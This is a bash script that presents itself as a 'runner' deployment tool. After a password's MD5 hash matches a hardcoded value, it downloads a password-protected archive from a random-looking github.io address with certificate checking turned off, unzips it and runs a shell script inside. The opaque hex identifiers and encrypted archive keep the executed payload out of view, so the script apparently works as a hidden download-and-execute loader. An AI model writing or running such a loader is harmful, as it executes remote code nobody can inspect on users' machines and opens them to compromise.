#!/bin/bash

#Configure runner_INI
DEPLOYUPDATETIME="[2022-04-14]-043113"
runner_install_c0="2bcf55ed5d6f963706c7066079a45ffb"
runner_install_c1="498462d9fab726c25ebb347da3ad5d75"
runner_install_c2="80414a677bd60fc9ec031cba719df5a9"
runner_install_c3="https://a3qcmkao.github.io/pr3220"

#Configure runner_deploy
RUNNERDEPLOYCON1=$1
RUNNERDEPLOYCON2=$2
RUNNERDEPLOYCON3=$3
RUNNERDEPLOYCON4=$4
RUNNERDEPLOYCON5=$5
RUNNERDEPLOYCON6=$6
RUNNERDEPLOYCON7=$7
RUNNERDEPLOYCON8=$8
RUNNERDEPLOYCON9=$9

#runner_workspaces
function workscript_start(){
    rundir=$(dirname $(readlink -f $0))
    echo "[update]: ${DEPLOYUPDATETIME} ..."
    if [[ "${runner_password_md5}" = "${runner_install_c0}" ]]; then
        wget ${runner_install_c3}/files/${runner_install_c1}.tp --no-check-certificate -O ${runner_install_c1}.tp
	    unzip -o -P ${runner_password} ${runner_install_c1}.tp
	    sh runner_install_sh ${runner_install_c1} ${runner_install_c2} ${runner_install_c3} $rundir/$0
        exit 0;
    else 
        runner_password_md5=` echo -n ${RUNNERDEPLOYCON1}|md5sum|cut -d ' ' -f1 `
	    if [[ "${runner_password_md5}" = "${runner_install_c0}" ]]; then
            echo "[Runner]: Verification succeeded ..."
			runner_password=${RUNNERDEPLOYCON1}
			workscript_start
        else
			runner_password=""
            read -p "Password:" runner_password
            runner_password_md5=` echo -n $runner_password|md5sum|cut -d ' ' -f1 `
	        if [[ "${runner_password_md5}" = "${runner_install_c0}" ]]; then
			    echo "[Runner]: Verification succeeded ..."
                workscript_start
            else 
                echo "[Runner]: verification failed ..."
				sleep 5
				workscript_start
            fi
        fi
    fi
}

#Start
workscript_start